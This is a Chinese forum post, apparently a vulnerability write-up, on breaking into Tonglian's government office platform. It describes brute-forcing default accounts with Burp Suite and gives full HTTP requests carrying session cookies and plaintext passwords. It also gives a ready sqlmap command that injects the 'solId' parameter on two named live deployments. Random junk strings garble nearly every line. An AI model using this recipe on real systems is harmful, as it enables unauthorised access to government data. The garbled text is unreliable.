|
" H `& }& m. s/ K! x. I
% S5 o+ N9 g. z* Q& P
8 A* m( W6 |( h1 x" Z5 K: x: B$ Z
" a6 p* B0 q6 K: U. d8 o5 g6 w- { 平台简介:2 S* f- l2 x* T
$ z- r: W; r5 j7 B1 u& E7 n/ E! v) t
" h: W) A3 y6 c7 P; E3 W
9 x1 f7 u7 B4 T0 y
; R3 l8 X) X3 e D# F
1 y0 y: f( u1 n# i) N* G$ f 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
1 H9 }) L+ I* @6 F) n h3 j同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* ^; W, ^2 R- ?2 b* }% a, d同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!% O9 q7 p3 Y. {' o8 r- }9 `
# o0 d" E+ T# ^2 V) G
9 S4 R& ^9 u! B+ H: N! j& V+ n. N
, L2 H8 O: i7 D% `( q! m, V+ |
! k4 }- K0 y8 L5 r' }- ?0 v8 L
?+ z r: _% z: w 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
4 k0 P# O( a; k ? ( h1 \! u# n. v) r5 J p1 b
4 e$ l3 S$ l" d* {
! _1 O/ \' e) L/ _ f! c # p9 X3 ]# d8 h2 D3 w
$ ?1 E& @' S4 q
http://1.1.1.1:7197/cap-aco/#(案例2-)2 ?* E. P& ?9 T& _- }4 D
5 E# }3 t2 [; i/ j! y
+ s9 J1 }- f6 v: n% f y- s http://www.XXOO.com (案例1-官网网站)& Z- b. c& `1 F
8 m6 A- N m, i6 I1 W: X) p+ j" \
" G) K1 i* e5 W, J: l2 F% x2 e
" k, k+ U9 |3 R( {+ i/ e% o5 W0 ?1 e
$ ?# \6 l$ Y& N" b1 b4 F: \1 e2 U! P: N8 H
漏洞详情:$ j8 C2 P* q: T6 G- ~+ i9 E: U9 l
: N* b6 K! T% Y: S0 ^+ b( p) b' Q4 v, p7 y) }% _
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
' C0 S9 o0 F X4 h8 _% b3 t
; H+ ?' t3 f" p" ?7 l% ^( z( \6 A: F: J2 b( O
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:; K: X5 N; m7 R0 Q" |1 ?' `7 k$ }* b* g
: t, e- U" t2 a+ N$ w1 n0 w a! M4 D9 |* Q% L1 p
0 \4 x K$ H$ J+ v9 b
( W* L* \6 p& `; o, l- C* B; ?
) ^% k% P: O4 m# Q* r  ; P2 H7 J) v% P/ C' u' _; J2 g
% c7 Z1 E$ g8 G( _ ?
% b4 h1 t0 V& @: |& {+ i$ _. T( b0 [ status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:8 Z/ n$ b& ^7 L- `: h
; z0 y$ i7 E" Z2 _
. d7 w7 j' s* n1 w: X% I, t 1、案例1-官方网站1 c2 H1 y& q1 X2 Q, m; q% U3 f8 q8 @
3 a0 ^- P& L1 ~: |
, M% w1 ^' L* @; |/ N GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
4 G6 I/ @% ^8 |: i3 K4 k# m# T
1 u- {* |) C. @4 t. ], {1 `# m
# r6 G- k! ^: [! r% F- G7 `* h Host: www.XXOO.com7 Y/ a9 d7 D Q' t7 A
; y) R0 n$ B: s$ K0 W {
( N$ o' Q) @8 i. v: E, G9 f
Proxy-Connection: Keep-Alive$ ~7 k$ t. I* y Q7 B
3 G9 a3 F0 V$ h$ m& g# `5 n' y
% v2 p$ ?0 W# N9 V Accept: application/json, text/javascript, */*; q=0.01
7 a/ s* ?3 P& `: k* Z6 v 1 r5 U! p% s1 J9 E. v
0 ~, y* [& V+ C7 Y$ Y
Accept-Language: zh-CN
- Z( X$ E/ x) F4 ~& z2 B3 m ; R1 K9 i; P% p% T8 S" ^
c8 } {% v+ ~( N; c+ ]& e% G2 j Content-Type: application/json
3 o$ F, `/ h, L3 l4 j; ~ : J: d0 @) n- K) L
/ Z2 J( s9 a* ^$ Q* N3 h8 d6 M! l/ d User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko3 f1 G1 b# D) p1 N" x7 I' R
; ^. E8 i t- Q4 X2 u
4 i- ~5 s. j' {. c X-Requested-With: XMLHttpRequest
9 m* Q1 V/ t" M7 ^" z
/ d2 b2 ]! ^8 \$ ]. c! N& n, D' S0 T# J% N- g% W0 y8 { k
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002& U# D/ P3 n7 W* H9 W
# x/ |, r9 S" p1 z) X. l
( q' A5 p3 Y/ s( w8 X Accept-Encoding: gzip, deflate, sdch
2 m" e) ]' w' O " z8 y! B8 R2 @3 k z& a
7 U# L+ b' l" h2 w4 S Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
* R) h9 z! T5 ?5 O
1 l% m+ T `' G2 E( t0 h% U1 D7 }' c' w. m8 F+ q" m( w: g- e* l
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
6 O5 @$ g. y: ]) I 1 z/ U) Q! K' u" F/ {" T5 [
( g& y+ t/ B! y. M! w 
+ \0 H8 x U9 Q5 R + r5 ]- C0 Q. x& F, `
# N7 N# \" l& m. A% y% Z
4 G. I/ l% P' H+ {6 [- W
' i4 q8 N/ ?) q8 C$ ^9 a! l
$ e, i! J8 D {7 w/ Z' Q ! S* h( f5 F! c
$ d! P- W. U. u: B; ?' G; X$ ^8 B, a% a+ }# {
' z5 J( h" K+ G' c
( V' V S" `8 c3 ]" j7 ~0 ^( ^2 W. b+ h- n" g& l
( y: e* J9 ]% l. i% m0 t: [' |
6 j) u3 _+ s" d: l, Z u
4 {" L4 h% O3 \8 p 2、案例2-某天河云平台
6 T6 e+ P" B5 O! x) s
4 O# [& _3 s2 G; j1 s0 b( w4 ?# s
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.13 Z7 O' ?6 [3 O6 G7 g. O& n6 q: h
" K) g$ z6 ]/ H! U' J+ E8 q
5 U9 ~! q7 V: K6 g
Host: 1.1.1.:71979 U' Y* i9 U6 o1 t
. }% {+ s. b5 c6 \
0 t1 g% d4 K( K& V Accept: application/json, text/javascript, */*; q=0.01
2 y( ?( y( P5 b2 f7 x r( v * _' k5 o9 n+ m9 N5 Y& C, G
; S4 v5 N8 l+ o6 b
X-Requested-With: XMLHttpRequest+ C8 ?( |$ Z, G. f: `. n! }
/ b) p, y) T7 I* F, U6 K8 F, Z+ Y5 C# q1 w5 i) `0 k1 v6 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.07 Y! I5 U# _. A8 G5 J0 E
/ v- l$ h' w& l6 H$ U, x+ E' m7 w [1 ^1 C/ G) j) j0 l% M
Content-Type: application/json
5 j9 u7 p. U, ?: c" C! j% x: D5 ` * p4 S1 ^. w% f6 Q( H( f! f2 B
: J6 P( Y/ ~1 S
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
6 S) A5 b* x) Z0 U0 b- ]# o1 x
5 u# Y' {: x3 o8 P M& L- j7 A- G. _ z$ _8 b+ p5 U5 z
Accept-Language: zh-CN,zh;q=0.8
% ]3 a" B1 c8 o7 ]. f5 ]- Q- | ( m' l* J% g6 f5 B( g
/ j! O& Q* R9 K! j9 k& a- }
Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
% O6 V" Z; f. R. Q3 A 5 s- K7 @& [# w1 P: r
( y$ W8 @. D% M- h0 q Connection: close; m2 `( C- g# h( h4 p
, u- F" l4 t( N: \
1 a* \: d& m, j8 b- ^ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:: M% v- L0 A( W, f( s- S: a
, G. R+ I4 p! N; w/ b P
7 @: u; t9 r N+ {" N4 L. T% Y" w 
; ]5 F' y0 u. ^ \( G' ]
1 Q; P8 I8 ?0 F1 o# z3 N7 V O# I* ^0 ?7 Y4 U& K9 d' x
: N; T+ S2 V9 l* W4 _ | 
发表于 2018-10-20 20:15:17
收藏
支持
反对